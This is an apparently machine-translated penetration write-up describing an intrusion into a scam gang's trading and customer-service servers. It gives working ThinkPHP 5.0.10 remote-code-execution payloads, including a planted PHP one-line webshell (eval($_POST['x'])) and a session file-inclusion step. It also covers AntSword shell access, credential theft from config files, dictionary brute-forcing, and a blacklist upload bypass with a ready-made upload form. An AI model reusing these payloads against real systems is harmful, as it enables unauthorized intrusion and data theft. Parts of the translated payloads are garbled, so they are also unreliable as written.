Title: In-depth scam team

Recently received a task to investigate a fraud gang

There is a registration interface above. You can directly register a user first to see how they cheated.

Good guy, users earned 800 million yuan, and users who have recharged call themselves experts.

At first glance, this kind of site is a pig killing disk of a fraud gang. It uses the TP5 framework to build it with one click, which is convenient and trouble-free. Later, according to the error message, the framework of tp5.0.10 was indeed a debug mode, and it was a pig-killing game.

Just use tp5rce to type phpinfo first

s=captcha

_method=__constructmethod=getfilter[]=call_user_funcget[]=phpinfo

It seems that there are many banned functions. At this time, it is more difficult to write a shell with tp5 rce and session. It is very convenient to use tp5 log inclusion and session inclusion to getshell.

You still need to find the file in the log. I will directly include the session to getshell.

First, set the session session and pass in a sentence Trojan

?s=captcha

_method=__constructfilter[]=think\Session:setmethod=getget[]=?php eval($_POST['x'])?server[]=1

Then directly use the file to include the session file. The session file of tp5 is usually under /tmp, and the file name is session_sessionid

?s=captcha

_method=__constructmethod=getfilter[]=think\__include_fileserver[]=phpinfoget[]=/tmp/sess_0mg7tlcvtmpv06cb732j47chb3x=phpinfo();

At this time, we can connect to the shell through the ant sword

You need to add the parameters passed in the post to the http body connected by the ant sword

After connecting, find the database password account by finding database.php under config

There are also financial and technical contact information

Log in directly to the background

Good guy, there are 30 members and more than 400 robots. The amount can be modified at will in the background. It is too bullying.

I always feel that the information is a little too small after calling here, only a few mobile phone numbers, and the bank card used by the fraud gang to collect payments. So I collected information on the operation site. It turned out that the customer service site was on other servers.

Find the customer service background through directory scanning

I tried the weak password and found that I didn’t even have the user admin. The administrator is quite aware of it.

I took out my treasured dictionary and burst it out, but I didn't find any existing user. I guess his username is either a phone number or a very long username.

It seems that it's not OK to enter the background

Then through IP counter-check, it was found that there were no side stations, and this site only had this customer service system.

I scanned the domain name and found nothing

But there is a Powered by Ai Customer Service PHP online customer service system under the page. I think there should be source code on the Internet, so I went to Baidu and it really has source code.

The website is developed based on TP secondary, but TP's rce is gone.

Only one step-by-step audit

After searching for a long time, I found a blacklist-based upload function uploadimg in the application/admin/controller/Event.php file

Define an upload function uploadimg, then define a variable name to get the file name, and separate it with a dot in an array, and obtain the second array through the variable ext as a detection. When the file is passed into index.html, $ext=html, html is in the blacklist, so the upload is unsuccessful. If the file is passed into index.jpg.php, $ext=jpg, jpg is not in the blacklist, so it can be uploaded successfully.

According to the routing rules of TP, this upload point should be located at /admin/event/uploadimg.

There is no upload point on this page, it only constructs an upload page by itself

form action='http://ip/admin/event/uploadimg' method='post' enctype='multipart/form-data'

label for='file'Chenguang customer service upload/label

input type='file' name='editormd-image-file' id='editormd-image-file'

input type='submit' name='submit' value='submit'

/form

If you upload index.php

It's true that the upload failed

If it is uploading index.jpg.php

It can be uploaded successfully

Take the customer service site

Package background data to jc

Here I would like to urge everyone not to believe in order-brushing. Those who ask you to recharge can get money. They are all fake. Don’t think about getting rich overnight and taking advantage of anything. There is no free lunch in the world. Here are a few pictures for you to see

These fraud gangs are justified and well-founded, and will only ask you to fill more and more. They are typical pig killing trash

Penetration summary:

1. Register a test account

2 After an error was reported, it was found that it was tp5.0.10

3. Use TP5RCE to view phpinfo

s=captcha

post:

_method=__constructmethod=getfilter[]=call_user_funcget[]=phpinfo

The hazard function was found to be disabled

4. Use tp5 log inclusion and session inclusion to getshell

5. Set the session session and pass in a sentence Trojan

?s=captcha

post:

_method=__constructfilter[]=think\Session:setmethod=getget[]=?php eval($_POST['x'])?server[]=1

6. Use file to include session files. The session files of tp5 are usually under /tmp, and the file name is session_sessionid

?s=captcha

post:

_method=__constructmethod=getfilter[]=think\__include_fileserver[]=phpinfoget[]=/tmp/sess_0mg7tlcvtmpv06cb732j47chb3x=phpinfo();

7. Connect the shell through the ant sword, and add the parameters passed in the post to the http body connected by the ant sword.

8. Discover the customer service background through the background source code.

9. Found that the service background is Ai Customer Service PHP online customer service system, and there is a file upload vulnerability in the system.

/admin/event/uploadimg

form action='http://ip/admin/event/uploadimg' method='post' enctype='multipart/form-data'

label for='file'Chenguang customer service upload/label

input type='file' name='editormd-image-file' id='editormd-image-file'

input type='submit' name='submit' value='submit'

/form

Original link: https://xz.aliyun.com/t/9286